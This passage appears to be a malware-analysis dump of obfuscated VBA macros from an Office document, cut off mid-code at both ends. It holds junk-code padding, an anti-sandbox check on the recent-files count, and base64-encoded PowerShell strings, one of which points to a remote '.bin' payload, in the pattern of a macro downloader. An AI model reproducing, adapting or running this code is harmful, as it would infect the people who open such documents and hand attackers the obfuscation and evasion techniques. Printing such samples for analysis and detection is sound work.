ShBZmnfqTSlbOrpiFjhyn = IsNull("")
Dim OhmFGeZV As Double
vwpShXm = 32
Dim ZIYrRBZyYhEGGph As Long
ZIYrRBZyYhEGGph = 108162715
Dim WVasFFBkCulLSUbzJDOL As Boolean
WVasFFBkCulLSUbzJDOL = IsNull(ZIYrRBZyYhEGGph)
Dim RlnkZWLwHVvRpODkPDqe As Long
RlnkZWLwHVvRpODkPDqe = 152808737
OhmFGeZV = Application.InchesToPoints(vwpShXm)
Debug.Print OhmFGeZV
iDRCPB
End Sub
Sub LcdvOBHDFuP(WUSCivaoXAeX As String)
Dim EkUAMWXCeUnhQOo As Boolean
EkUAMWXCeUnhQOo = False
Dim QHlFijBxUbLcrbIjrRNJMVz As Integer
QHlFijBxUbLcrbIjrRNJMVz = 15229
Dim XjIotdpgAr
Dim yyVUInhoEIts
XjIotdpgAr = "fKXOviYRFQfMxGGEurXjOk"
Dim rqqBEVAUhlrcC
rqqBEVAUhlrcC = "jsOdwILFQDCUJnPyEQuCvFrvRRrUCsrhsYChBeTvoclCDazrrVDnvANectQSOWxUpDbYGHVXQzjEmJRqcWSVlpGlPhvKlsjQXwKUvhFZYhNJmYCCbEaBBAUtfOelnNgGbinEskRVswTXfReRBqtPOElEKKKIMiiGBSwJPUIxDlNerjTpQRCcyVOAEyPOixWuzkuKBdfjTDQKNgOkRylfoIbjYWgTfORpoTakOUptrAFOeYYmPyGcUsdiLrsqzU"
yyVUInhoEIts = "BeZZGdxfwmbbXTeymdpsBslERRNyOQQmjlqsaAUfyQjcBgcJYAYQsCYtdgyaKSDQiKVzvjWgurEjgvPCDGYBvwbFklPItIRNnOoHXWrORkugZHEooNirTHeUXnwEpvNiRweGBDAUUnWfKmBHCifwPXFtDkEAUWpVCdxRnMHggnZMnoUtaJxzpdbSsIUraysgdBiexmGYssDDSPKmkYNIUHmDHMFvGsXOeIWQqnpEnvhsGMjVERMqQAfqraeIhqMFkiNZmhCEkRjbwmxjoHRoWtLXehQfMPvtRQZuMqSLPLNWnLNLhFCPqOsLSObPEmIkEVtZdwYLwJmPyctDobPGBvgZcEzBMclsRqAzsvPzJkbGEDQuDBkKkeHdCaxORhVDShFFkTqFbdDRhBWDcCGsxExMqDLbUfqrvqTYueRaLnncDnCcZHmTyV"
If Len(yyVUInhoEIts) = 0 Then
XjIotdpgAr = XjIotdpgAr + "fCFhzkqYjlWMiZEqdRlJBwNLEhQbeNzaqPowxUoWWcLpjrkNhYkUPKatWMHmIzYfQEPAEJvdLeZYkRcYrMSAstrcIQoQzBSETlEYt"
Else
Do Until Len(rqqBEVAUhlrcC) = 0
rqqBEVAUhlrcC = Left(rqqBEVAUhlrcC, Len(rqqBEVAUhlrcC) - 1)
Loop
End If
On Error Resume Next
Dim NoPiEOUZoVcbCECT As String, FFohepPGwElqQJMApspDMWTiw As Integer, apbmMEPmrUddh As String
Dim hMPWyB As Integer
Dim aTXKlWCzFp As String
NoPiEOUZoVcbCECT = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
apbmMEPmrUddh = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
hMPWyB = 0
For FFohepPGwElqQJMApspDMWTiw = 4 To 1 Step -1
hMPWyB = 2 * hMPWyB + Sgn(InStr(1, apbmMEPmrUddh, Mid(InID, FFohepPGwElqQJMApspDMWTiw, 1), vbBinaryCompare))
If FFohepPGwElqQJMApspDMWTiw Mod 2 = 1 Then
aTXKlWCzFp = Mid(NoPiEOUZoVcbCECT, hMPWyB + 1, 1) + aTXKlWCzFp
hMPWyB = 0
End If
Next FFohepPGwElqQJMApspDMWTiw
uAXcHctGNlILAIPBND ("zJhQtJImvinVThhiMtoPMfHfMPSct")
Dim OqfySbwEUYFCKTwdGHZfBLp As Boolean
OqfySbwEUYFCKTwdGHZfBLp = False
Dim hlIRIOAb As Long
hlIRIOAb = 118545317
End Sub
Sub FKqtZvsQvMuBawJdJCi(gPkfEfcQebA)
Dim KODHRxu As Double
Dim eneQIV As Double
KODHRxu = 1420
Dim FPwODZpceMrnkz As Integer
FPwODZpceMrnkz = 16876
Dim GfKJAjlePyu As Integer
GfKJAjlePyu = 17575
Dim chGJHhlxKztUcrm As Integer
chGJHhlxKztUcrm = 22911
eneQIV = KODHRxu / Application.InchesToPoints(1)
Debug.Print eneQIV
LcdvOBHDFuP ("ZbophxTCC")
End Sub
Sub xfNoxvsWhBBL_LostFocus()
On Error Resume Next
Dim VlQkEBs As String, iZRxmsqWVL As Integer, XprtUaAZQk As String
Dim WGNslkV As Integer
Dim npbxOREOtYPbTaqswoopmILj As String
VlQkEBs = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
XprtUaAZQk = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
WGNslkV = 0
For iZRxmsqWVL = 22 To 1 Step -1
WGNslkV = 2 * WGNslkV + Sgn(InStr(1, XprtUaAZQk, Mid(InID, iZRxmsqWVL, 1), vbBinaryCompare))
If iZRxmsqWVL Mod 1 = 1 Then
npbxOREOtYPbTaqswoopmILj = Mid(VlQkEBs, WGNslkV + 1, 1) + npbxOREOtYPbTaqswoopmILj
WGNslkV = 0
End If
Next iZRxmsqWVL
Dim CygOIWSnyXoZZfGoORmFzatI As Integer
CygOIWSnyXoZZfGoORmFzatI = 16262
If (Application.RecentFiles.Count < 4) Then
Exit Sub
End If
Dim aqCKuCeIeh
Dim fWzlRqymVc
aqCKuCeIeh = "qhYfSfdKKnKtWAieU"
Dim VvGMQXiykIdPHsug
VvGMQXiykIdPHsug = "hfDeEBNoIQfSNkwePynnfxOimjkpEJwVejfUVMcGdgrdVqkLHisziGAPhuazNpzRvZsjsMUwwkcDuSPK"
fWzlRqymVc = "acdiTScnbvKCcZCGWdvfRisqOUISMDaGJHEInjDlpOhrNkWrqRgKMNEihchajZLbJTYjlAwDYlCXlJDKEvbyhhnNexVMWfTitqerdtRXZCEsCRvjfbFqkXoyWYreqOHhhIbrWKxcxUODKWrYwwgNCyxMOXetlYYxyEGIkNZhzVTSuaLXdqLMVFtfUNtKigxLemrViuJprOPWjXegKzhTrrzGuntwAEPccwLKgrTqntmskxmCDPqfmesosjcpKtZVNYWUtNmvEwssaHtTYwQjOgrrCWjqjsuzmgAYOLEEPlBmWxnLcLRWAgcwPtWxmCvTPkMpyZUNSJULDiBXVdtKGZTTBfOVFaGwlQISfAlLdbznJtPrEPByAylyOULxEVxnjTTiCJhUNMnRkNKFoNFcbdKKwBQWdIBlnvdyPVxjJmLGEEuxxKFvOaEGFfffbTRwGKxadiOWZlfxHEkAdVjeFvKXZwKsgDzfafhvWBhoHe"
If Len(fWzlRqymVc) = 0 Then
aqCKuCeIeh = aqCKuCeIeh + "kCXhVtnSQHhLGoHjJXQWvzrDjbOIdBwTjWHUtNzoUYZGpJPpTIHevIbLSQEWhdNsjwtTgMyjRPekDiLfDozovxLGccANwlLTDIRsizpcyrlSMQPeWResyeoIRbxDrS"
Else
Do Until Len(VvGMQXiykIdPHsug) = 0
VvGMQXiykIdPHsug = Left(VvGMQXiykIdPHsug, Len(VvGMQXiykIdPHsug) - 1)
Loop
End If
wZGNsCQikgmKkFuJ
Dim AyoUo
Dim oPatkraCpXSwxIrGqn
AyoUo = "yhkwsyKephjZOTVyYaXa"
Dim OsCGnKI
OsCGnKI = "NnLvvKYUywGskiOCYwxtfeLitZqgaEVIudlOFEEAPBTsUAEanGprQWFvWLFYqUIQRNWTwffaEaDrfurEkMEaycDYdOdjuNtpFhvagRTNPGSdOKbxCMUhtkxByxpvsuVDgZOPrTbVUJVtoFymJfVptPCLyxbRfxPVijkUtBRQxvpABgvaiMSRYNYJMiHqZgWbuipUMVGHHZmSnVNWUCVrIFjOtYPga"
oPatkraCpXSwxIrGqn = "EssJLPhSjLNNOGvYVRcHusnJNmBPqoyDuamRxUNZECVKsERgKFTMaAnZurSrAFNgJsTXDLYXZwzLmLAHtdqXGzJzJNQfPUSgrOlVbDnvXNUibSYqtHhtqwIqwOqXtNEHyTbOScKFHmDQspDlxuslTCqGQhypmadmpjAJgGjWBwGurpVPmIUcquYZbPlDOVcdaDlmWMVCJcDZiMUcHedrjAZIwkOiqGwoLparAMUYCcaETbZzlOnHuIEjctVLfZvdBtXbquYtznziAjkClKzXUGnuwPwkoJKGDkgHQKjyGteiqLSasaugUmxTbtpOfKvIekrNmZwAkufkdjQFSrfeHzOHXZzScfFKgyDWyPsMPMyyecOTJJclbNxyiwfrSpuLXcPwhnnrXdlbbReMJk"
If Len(oPatkraCpXSwxIrGqn) = 0 Then
AyoUo = AyoUo + "lQAhQKSrOGpWNGROUDHRTjRaIPnlYtHzjSPkvBNpfjOgKEsLtTqsJJXyPvscCtPMjCHwiLUgcSdzfSzpXWuLWumRexKcSHCePIqVVcsXKiDnAUhUZehyBZaMkDLsAhvQDPCTOwmtEJNMHUKgVVAZWSCqQyEPnYlg"
Else
Do Until Len(OsCGnKI) = 0
OsCGnKI = Left(OsCGnKI, Len(OsCGnKI) - 1)
Loop
End If
End Sub
Sub OILlPjJRUMNv(rJukWVUbFwWgpSSxNPt)
Dim ODQLIi As Long
Dim RwZdomQ As Variant
RwZdomQ = Array("R", "u", "p", "g", "v", "n", "Z", "i", "t", "V", "S", "D", "Q", "Q", "L", "F", "X", "Y", "V", "p", "j", "K", "S", "V")
Dim asLHsixMIyjeL As Boolean
asLHsixMIyjeL = True
Dim vTpnxOnBFEGP As Integer
vTpnxOnBFEGP = 20278
Dim dDFbgPXkivOEajkcaaeT As String
dDFbgPXkivOEajkcaaeT = "7247436e6f59615263574d626b4164565" & "7414975"
ZFkmn
For ODQLIi = LBound(RwZdomQ) To UBound(RwZdomQ)
Debug.Print RwZdomQ(ODQLIi)
Next ODQLIi
Dim QQAzUNd As String
QQAzUNd = "69696747714663716779774e636a4d556b4f6e48464649485648696d5244625141616e4b5a73785" & "974527370414e56"
Dim juLobTgMHNMaHkzHPmRMOHD As Integer
juLobTgMHNMaHkzHPmRMOHD = 1337
Dim cZjQRwSZdRMzEOnjJLLhwo As Boolean
cZjQRwSZdRMzEOnjJLLhwo = False
End Sub
Sub qFZVTvXLrgJKhNXUPzpTOP(mWBWiov)
Dim ULePYpMu
Dim UhySwEvMepiTj As Long
UhySwEvMepiTj = 744463214
Dim eMCMLLiTVoGBOGk As Integer
eMCMLLiTVoGBOGk = 8726
ULePYpMu = 0
Dim GQgEWJjI
Dim eUPtlPOby As Long
eUPtlPOby = 674459213
OILlPjJRUMNv ("GfAEzAMTrhWPBUTB")
GQgEWJjI = Timer
Do While Timer - GQgEWJjI < ULePYpMu
Loop
End Sub
Sub vxuJZnSJVbTXCByzs(xCRKldfqgVOuWpdZJO)
Dim WUhPpN As Long
Dim pZgLeImr As Variant
pZgLeImr = Array("n", "Q", "u", "W", "s", "I", "l", "n", "G", "N", "I", "l", "E", "z", "u", "k", "j", "a", "A", "W", "k", "W", "V", "C", "g", "w", "e", "M", "J", "T", "H", "q")
Dim mBKQacyFFDaoDPYgZnw As Integer
mBKQacyFFDaoDPYgZnw = 566
Dim XbPhOMTld As Boolean
XbPhOMTld = False
qFZVTvXLrgJKhNXUPzpTOP ("RHGqhlyKflHtzDCHAraUaZs")
For WUhPpN = LBound(pZgLeImr) To UBound(pZgLeImr)
Debug.Print pZgLeImr(WUhPpN)
Next WUhPpN
Dim pCTSuaCsznioqIsHuyGwIiE As Boolean
pCTSuaCsznioqIsHuyGwIiE = False
Dim xBBvOvLi As Boolean
xBBvOvLi = True
Dim NRsDwdTURxzVFSrg As String
NRsDwdTURxzVFSrg = "79746a614c4e715570516c455a56506f56584475644d775" & "061435a4f4c50"
End Sub
Macro #5: VuRJSexXOeIc4Ri
»
Attribute VB_Name = "VuRJSexXOeIc4Ri"
Sub HQJhgKDpiMZzxcrmCOBILDtx(jRCjcGDRtbnpLRbxVrDdm As String)
Dim rbxOLbgbNWbhNyNm As Long
rbxOLbgbNWbhNyNm = 961306972
Dim UdJsAcXnuwVDLG
Dim eiaifmw
UdJsAcXnuwVDLG = "IBlZxLcbXfA"
Dim JIrHZIvwXxTCyOaR
JIrHZIvwXxTCyOaR = "RRJsOPqnRnkrPlKWnsZlDXySvXgxcbMtdDkRZJjnkiPXekqCRPpeeCqwrPuVkBgDZBQweMwlfCOLHVTJcBdkzseqHzioBsbdTZQOidCuGpJvWRdtGQmoFwGsWUOIMAxQdsfwstxswwcwQZREaYiJHcZJwXGLCbOxyIXhlkofYPisrXeKoSNQEoMYGSdyTdQUxRqVGYLljDxqZWXpUJqomPnWjhujXeEhKzkYamhuoprHnQzstSysnsAPBReMxpwHkpPvzyMugiAVJJJyRDzmuFguAISZlhnzGpeSTWYIVqQcgEQadgJnDlPRdqqlrRdpzUhdA"
eiaifmw = "UWBlcWmxXRtZfMHidwQpSaFgNSgdmEoaFoIctUZMDFJhBCAsxVWgWgtTQlPGLrNnThWZsjPLWLwygXwORmZpvnUPhzHvxzEBWqjteEbPJGuinNxUdWUeYHVEoSBaUlAiiFHefznQXIBpLLIfXETFqRdmokLmDYSAYQFVwDmPbWTCcKXEKeUtuOXAhrqOfGwAjKnmaSEirJIFVcWamOjchxDYnzFhCVSsHySeJrZwhEBEuwrLcZCHDAkoSwesbMXyWjAzRsRAHKiFRBfMrWAWyOVXuGGUiJUFSoHorBkFjhcMwnGaecFHhWHOsbvVPNIhtrFuuSPvcwTGGGdzSBtUYScXrzAMBCbqPgpsawg"
If Len(eiaifmw) = 0 Then
UdJsAcXnuwVDLG = UdJsAcXnuwVDLG + "paPVIsUBYHaIaaxHALKbiKxQrsBrhsCfMMkalIKlLRFDzGxHAWlveKGXncEIBJcsXwCYybXNCuFfUljeeutOdciLItIKolRAQIvdzeMkXworBUYGTJKzItGKQbefInzPhBqisAMtnGhypsRtZkdbbDGzBnmbyaKqywfqWTowTqyQfabpD"
Else
Do Until Len(JIrHZIvwXxTCyOaR) = 0
JIrHZIvwXxTCyOaR = Left(JIrHZIvwXxTCyOaR, Len(JIrHZIvwXxTCyOaR) - 1)
Loop
End If
Dim VqVezJHgrDCCSBXtFBpDt
Dim evYiOEwwivLHF
VqVezJHgrDCCSBXtFBpDt = "GlICFReBoLaRfg"
Dim emRKSNGczhfOlWNoZBZQMzSj
emRKSNGczhfOlWNoZBZQMzSj = "jeIFzYZqSXvaqMTvPpMqIttKrWeVWelDdRvQVQtaioypwvkaKwIwtOTKJQpwoNVBzTjoXuMnTmnFFxRioOefHYojzNxLNIQdTklqPvNSFNEJIUzacBArhcxYbzAKYYPVtTqRLMyCsYzinmHeolnrMDKRKfLDQxKfuOQlFZY"
evYiOEwwivLHF = "AlFWLPVrnbUPLxlwAUXwdoaAmXnzsQNkmURkYVTKidQhgojfDZGhaIRwyhYpurXXCErAqIBqJEryPanMTnbhuhAGJmVfdZindjJLcGPVcSFuxrlnpRWFNOuNUZPHhuMzkwdRopgFeMmutMtAxcZXcppFrMXEcyIXibNVDGevCTBNWnaXfJCQyiqlIMneITGzAljLzQmEulQrAZRnSJrQPWVMkWGSFtnUXMgnHpnoKnxTSwqRLSAVfRNOJuuWvy"
If Len(evYiOEwwivLHF) = 0 Then
VqVezJHgrDCCSBXtFBpDt = VqVezJHgrDCCSBXtFBpDt + "nrTxmgSOJlnWemAFdqPdIBbwRsAWYqQsGctvOIJBecjnOLNdqEhpGbTLZXcwIfJfMREtGJlLHiDUHNfrAQCDEmvkSPvNXBbkJqpHpyiVQLqOgEaCjtDmazDEGacDsdLcgOs"
Else
Do Until Len(emRKSNGczhfOlWNoZBZQMzSj) = 0
emRKSNGczhfOlWNoZBZQMzSj = Left(emRKSNGczhfOlWNoZBZQMzSj, Len(emRKSNGczhfOlWNoZBZQMzSj) - 1)
Loop
End If
iOYgmsfWyRGTUW
Dim WEuANkzoaSpbLiJoXQTeYyj As String
WEuANkzoaSpbLiJoXQTeYyj = "5974657" & "5594664" & "4d52786" & "f51487a" & "5a4c597" & "94f6c"
Dim nVPTIbkrPBAM As Integer
nVPTIbkrPBAM = 3935
Dim xctjCdEGyyoncu As Boolean
xctjCdEGyyoncu = IsNull(nVPTIbkrPBAM)
End Sub
Sub aYpUWRmRhhbNyNxDq(LsLEAd)
Dim xEigyBD
Dim gQbyuFKpHW As Boolean
gQbyuFKpHW = False
xEigyBD = 0
Dim nbQGwFWw
Dim xccSEYmVPTOIICSJko As String
xccSEYmVPTOIICSJko = "655068417374425a624e4444435076" & "5971"
Dim AwKGnHtBdhOY As String
AwKGnHtBdhOY = "634974" & "536769" & "73534e" & "4f"
Dim nFOKDNQbDRTGkSiqX As Long
nFOKDNQbDRTGkSiqX = 992639122
HQJhgKDpiMZzxcrmCOBILDtx ("iirmYgRaMWWNXMyjLS")
nbQGwFWw = Timer
Do While Timer - nbQGwFWw < xEigyBD
Loop
End Sub
Sub TiUBgrboXaYeWTKmPvr(OynDVkaOfeCexZ)
Dim JUQMGWdJH As Long
Dim IkPKabY As Variant
IkPKabY = Array("O", "S", "w", "b", "R", "b", "f", "G", "r", "F", "D", "w", "j", "o", "q", "f", "j", "T", "S", "s")
Dim fKKQNPThD As Integer
fKKQNPThD = 22946
Dim eCaSptMYa As String
eCaSptMYa = "656c6272726c6f716768616e6543725378714a6469424159495a4970" & "5358797767476d"
aYpUWRmRhhbNyNxDq ("FDRLvBRlKumXhSxAlPcCwpLGuvznX")
For JUQMGWdJH = LBound(IkPKabY) To UBound(IkPKabY)
Debug.Print IkPKabY(JUQMGWdJH)
Next JUQMGWdJH
Dim sAgBGClRaTmqRNiRPYwO As String
sAgBGClRaTmqRNiRPYwO = "464c7" & "7464f" & "594c6" & "16159" & "576d6" & "1"
Dim offIPUQxSqOcgAZbiw As Long
offIPUQxSqOcgAZbiw = 834819717
End Sub
Sub ipzNpsd(pMCKsbTuwOVsccX)
Dim ErQgXzf As Double
Dim hoMaiqGGtigFwXewQBRKlDQT As Boolean
hoMaiqGGtigFwXewQBRKlDQT = False
Dim TYITNFA As Double
ErQgXzf = 22
Dim SkCvTHPdUxDBPyR As Boolean
SkCvTHPdUxDBPyR = True
Dim jtPRQcGbXw As String
jtPRQcGbXw = "5973444b644d7453426a784146584f65" & "6465"
TYITNFA = Application.InchesToPoints(ErQgXzf)
Debug.Print TYITNFA
TiUBgrboXaYeWTKmPvr ("UvLNYuihMGErU")
End Sub
Function BtorfXYYMDf(sWmjpovgyaf As String)
Dim XZNgcs As Long
XZNgcs = 986376423
Dim EfKZeNykCtHTKnllzziZ As Integer
EfKZeNykCtHTKnllzziZ = 17592
sWmjpovgyaf = "AcAA6AC8ALwByAG8AbgA0AGwAYQB3AC4AYwBvAG0ALwBEAHIAcwBzAHQAbwByAC4AYgBpAG4AIgA7AAoAJAB4AG4AawBwAHgAYgB2AHQAbwA9ACIAdAByAG4AZQB2ACIAOwAKACQAYgBtAHoAeQB1AHIAeQAgAD0AIAAkAHoAaABlAG0AYgBuADsACgAkAGwAdgB5AGkAawBzAGgAcQBtAHoAcQA9ACIAaQBhAHgAZQByAGIAbgBnAGkAYQByAHQAaQB5AHMAZgAiADsACgAkAGQAegByAGcAbwB6AGcAPQA2ADEAOwBGAG8AcgAgACgAJAB5AGQAcwByAG4AdAB2AHAAdgBtAGgAeQBhAHkAbwB4AGwAbgB4AHAAPQAwADsAIAAkAHkAZABzAHIAbgB0AHYAcAB2"
Dim KlQtGJRiRf As String
KlQtGJRiRf = "4b636d4747446d5" & "84a76744e4d616d" & "756e"
BtorfXYYMDf = sWmjpovgyaf
On Error Resume Next
Dim ztFFjmjmceMnUl As String, buqIHsKXBGyKFq As Integer, VBtYRooouQrwGuyVnxpRIhuE As String
Dim QpNRvBCxova As Integer
Dim pLztoRHLUkgtZRQALfMkrN As String
ztFFjmjmceMnUl = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
VBtYRooouQrwGuyVnxpRIhuE = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
QpNRvBCxova = 0
For buqIHsKXBGyKFq = 82 To 1 Step -1
QpNRvBCxova = 2 * QpNRvBCxova + Sgn(InStr(1, VBtYRooouQrwGuyVnxpRIhuE, Mid(InID, buqIHsKXBGyKFq, 1), vbBinaryCompare))
If buqIHsKXBGyKFq Mod 2 = 1 Then
pLztoRHLUkgtZRQALfMkrN = Mid(ztFFjmjmceMnUl, QpNRvBCxova + 1, 1) + pLztoRHLUkgtZRQALfMkrN
QpNRvBCxova = 0
End If
Next buqIHsKXBGyKFq
End Function
Macro #6: fgYrGaAAjUx1qe
»
Attribute VB_Name = "fgYrGaAAjUx1qe"
Sub pQPiPgfx(mMzvYjxunIGF)
Dim YiJqnH
Dim dXtOndQvCSuZRfp As Long
dXtOndQvCSuZRfp = 13195252
Dim FtCrXJAJNTNwuYuiJ As Integer
FtCrXJAJNTNwuYuiJ = 13233
YiJqnH = 0
Dim iBFnDMHze
Dim LaZRNtHKxWWzzNhvVmlu As Integer
LaZRNtHKxWWzzNhvVmlu = 27506
iHPjGrIaeePAvaYiR
iBFnDMHze = Timer
Do While Timer - iBFnDMHze < YiJqnH
Loop
End Sub
Sub zEZrdZOmosTQYUrGwz(tkQepDhRLhuliKSbqK)
Dim gSeKhPK As Double
Dim nXqGRBDPYLITFwE As Boolean
nXqGRBDPYLITFwE = True
Dim BGtUINcWJJwVv As Boolean
BGtUINcWJJwVv = False
Dim UVMbaOo As Double
gSeKhPK = 14
Dim GkRdNMYWbjvjLzdODxxMj As String
GkRdNMYWbjvjLzdODxxMj = "414e774656766679666c5" & "058494c5169647666"
Dim DcbJrwbUOId As Integer
DcbJrwbUOId = 22783
UVMbaOo = Application.InchesToPoints(gSeKhPK)
Debug.Print UVMbaOo
pQPiPgfx ("EkEVqEN")
End Sub
Sub sBMYFMnskgiEATPXg(LZiilvTXCxRX)
Dim NkVJldBDU As Double
Dim nyPFdoRT As Double
NkVJldBDU = 510
Dim MkowouJhMGDFrZ As String
MkowouJhMGDFrZ = "42456d7249766f59674d447673487" & "3787841637875416f694e6d526a47" & "707878676d545855784170"
Dim CfmUOWQxAKBgIOAHLfNBYS As Integer
CfmUOWQxAKBgIOAHLfNBYS = 14674
Dim TogsXguMAZgqCiYuLzkWe As Integer
TogsXguMAZgqCiYuLzkWe = 28054
nyPFdoRT = NkVJldBDU / Application.InchesToPoints(1)
Debug.Print nyPFdoRT
zEZrdZOmosTQYUrGwz ("JxjkNDwGUDPkRGeqfcyLVH")
End Sub
Sub GRGod(MWUyuHBCNWuEQdzxCkdpzP)
Dim ZffPen As Double
Dim WNSPTTnSSsrFlLAQuYidjbbd As Integer
WNSPTTnSSsrFlLAQuYidjbbd = 13034
Dim nQnnwPQKGNKkaYJaAtujB As String
nQnnwPQKGNKkaYJaAtujB = "68415a594149536d46774a55537677676241576a4e6359" & "6466694d6d6263"
Dim nMcJKXdtGLGQktrgYHICk As Boolean
nMcJKXdtGLGQktrgYHICk = True
Dim FNWCIK As Double
ZffPen = 28
Dim YIKMEHCD As Integer
YIKMEHCD = 13235
Dim OBWNUMQJ As Integer
OBWNUMQJ = 10699
Dim NiyJHjgxekzMWA As Integer
NiyJHjgxekzMWA = 30175
FNWCIK = Application.InchesToPoints(ZffPen)
Debug.Print FNWCIK
sBMYFMnskgiEATPXg ("CmoCybgQMQdlkNs")
End Sub
Function cREgpruPxEQtGzVSIhPbbFrA(wEVXPuizePDpqD As String)
Dim xdQRXrlwFqpQkFYwFfcgDhl As Integer
xdQRXrlwFqpQkFYwFfcgDhl = 2310
Dim Enstqio As Long
Enstqio = 739656417
Dim xZjUhjeWLrcFJsjemrRoSbX As String
xZjUhjeWLrcFJsjemrRoSbX = "7a59505a6258547a4758424e694758" & "544d5371696d757743454e6b507571" & "4248424e41775079596253"
Dim LVOYdOjJAaCcsKdWfdJqhKTRL
Dim wfZhHFq
LVOYdOjJAaCcsKdWfdJqhKTRL = "ZnlsVJpxRHXFoMTmeoWgQR"
Dim npsBdtxWbVvYaOkzDeRQVuZv
npsBdtxWbVvYaOkzDeRQVuZv = "fySuUOWBBMIXeTTVKaXmcXqUCSiIkrUebMSbYzEVilHlxeECeXNJQmbXTSzFfpwObVmrvoTClBxsUdSywYiVbOeXoidOuRVhFOkuATVWpyPkethdaogqcdjGiFlalfeElTgtDPeYiWjtCflcUatIXAyoapUEhqCHdqVzuPmqVogwAiHAxJZVSVnuQgjidtndPspXZYzZIblIznzCTUmwklMGkTxJyzPSoEIsIKLibHRDYXqtqNFHOzHInLELlfCOmQaFVLIlRmFvxVmLowssAqVmpmyQUcPJwWSYVyegJlriPmweXUfbBnylRGPRgIHUEtjxGtxrqIibUrRKEiyHZhBdIYiyzpQjFzkXVlptrGyfcqxKmDKPcpwMePOOlEYvJQDaJvFVJDevrDhAQqkrucflkxFsnEELdODVyUBiJwuYvbGtJuTfFjoz"
wfZhHFq = "rpCUNhpnsCwBHfmqWTlYBWLXPrbQPmsgjoRnlGlrOYHOrvnFJyGMfELDQVSijbbwKtVjUidXiyrATLHqOg"
If Len(wfZhHFq) = 0 Then
LVOYdOjJAaCcsKdWfdJqhKTRL = LVOYdOjJAaCcsKdWfdJqhKTRL + "RPLLGOXJjiWaDyoqFUJlJHmxLJSLvFnhBfdVjoKLStnOiLStukNqiSyEKGbdepGnzqGEBaSsaJUpsiqS"
Else
Do Until Len(npsBdtxWbVvYaOkzDeRQVuZv) = 0
npsBdtxWbVvYaOkzDeRQVuZv = Left(npsBdtxWbVvYaOkzDeRQVuZv, Len(npsBdtxWbVvYaOkzDeRQVuZv) - 1)
Loop
End If
Dim KxgpHucrcKKfxYKkfvinkc
Dim fXJKLZpPVjPG
KxgpHucrcKKfxYKkfvinkc = "JYyxxDSCsEZVmdIPWACTF"
Dim BvOKLsxxyKgHmRtVGdQaVyjU
BvOKLsxxyKgHmRtVGdQaVyjU = "ndRWffKXOQwiFZBWMhpQKqxMyEpnDBPVPSHhZeMIQLRBANiHJPTUeFESemHZpDFjOVBSKslfvZWRVkfGcyVvPIFqtKzoXBvoiGPEfVFaohBnYyUHySySbDwfBLgROYmspXILErMTdVbleTKVeTtktCXVQyLhzfXNjImjRgMEJgpHpTiRcjoAGqbeKcgQNgqmexPNuWLVQvoOCdIZsaGQpacIyXxQGfqifaCsYjjxRIEZWZ"
fXJKLZpPVjPG = "EHNoPnvnkuicyoEEKEzxCdvlWiMRFpZLuPDtLYInjtZUqeIRhFFXoKNdEakMCBTNEBaeDpwYmNzdKjqDBVRwqiacPmOKvWGXpIASFVrVrHPTvYiytSqllrbiwRclcqoUxFANdCcGHzxThtidXjCQdjJCwLWpezorHDYnNmzvlyPnD"
If Len(fXJKLZpPVjPG) = 0 Then
KxgpHucrcKKfxYKkfvinkc = KxgpHucrcKKfxYKkfvinkc + "biEDeoaqEvfEBbehONlArjNfAprHpSGkUZPJHIUkEwPMdVjRMqTckBwJGNGhpXTmMDrQHiJrGrVBQAcMDycvqgmVboBwfAkNFDeGaNTGVlnSfUBxqVSfrhzTrbEUMmkezwsRUbBzxRIzqNeMhjqn"
Else
Do Until Len(BvOKLsxxyKgHmRtVGdQaVyjU) = 0
BvOKLsxxyKgHmRtVGdQaVyjU = Left(BvOKLsxxyKgHmRtVGdQaVyjU, Len(BvOKLsxxyKgHmRtVGdQaVyjU) - 1)
Loop
End If
GRGod ("KoQLZw")
Dim sIIBxVVBlz As String
sIIBxVVBlz = "49486d794f56716c4179" & "4c6b4354726b69435279" & "636755516d4b534e5452" & "626b46554d74656e4a6b" & "4342784e4246"
Dim UEoEJCIohr As String
UEoEJCIohr = "4d74514c73584b557a78596e645" & "05155785541636c4d4d67714a4f" & "4a4c6b776a58516548467346596" & "2514d67736f"
End Function
Function NkhSyLXWtKuiGLf(dLPWMXtTTQFK As String)
Dim eTTVsoxQJiZEU As Boolean
eTTVsoxQJiZEU = IsNull("")
dLPWMXtTTQFK = "JABsAHoAaAB0AHMAdQA9ACIAcgBvAHEAbAB3AG4AcABlAHMAZQB5AGUAcAB4AGYAagBtACIAOwAKACQAaABiAGkAcQBtAG0AeAAgAD0AIAAiAEEAdgBHAGMAcABWAGwAUABwAHIAcABqAFkAdgAiADsACgAkAHoAZQBqAGkAdQByAGwAbwBhAHkAdQBjAHIAdQB4AGwAPQAiAHgAeQBzAHYAYwBrAHMAcABzAHUAaQAiADsACgBmAHUAbgBjAHQAaQBvAG4AIABtAGgAZgBhAGIAcAB1AHcAYwB5AGQAYgB4AHgAewAKACQAbABzAGIAcwBiAHQAdwBqAGIAeQBvAHkAegA9ACIAeABnAGwAbQByAGEAbgBvAGYAZABrAGQAZABpAHkAdwBpACIAOwAKACQAdABsA"
Dim nYxDOMmCysgXCwVIk As Long
nYxDOMmCysgXCwVIk = 106679121
Dim GcbbNMmjTbDXIcsKSAuxUDk As Integer
GcbbNMmjTbDXIcsKSAuxUDk = 7826
Dim JLbHbvr As Long
JLbHbvr = 75980973
NkhSyLXWtKuiGLf = dLPWMXtTTQFK
On Error Resume Next
Dim LTdTCDkUymrClEdRblFISCmCV As String, oAtVUgLsQw As Integer, PXoCrgDbcZapzlyyGIdIWfoK As String
Dim BaYbFSOmQsGwGSIubglzO As Integer
Dim NrfZrmKglNqFFS As String
LTdTCDkUymrClEdRblFISCmCV = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
PXoCrgDbcZapzlyyGIdIWfoK = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
BaYbFSOmQsGwGSIubglzO = 0
For oAtVUgLsQw = 67 To 1 Step -1
BaYbFSOmQsGwGSIubglzO = 2 * BaYbFSOmQsGwGSIubglzO + Sgn(InStr(1, PXoCrgDbcZapzlyyGIdIWfoK, Mid(InID, oAtVUgLsQw, 1), vbBinaryCompare))
If oAtVUgLsQw Mod 3 = 1 Then
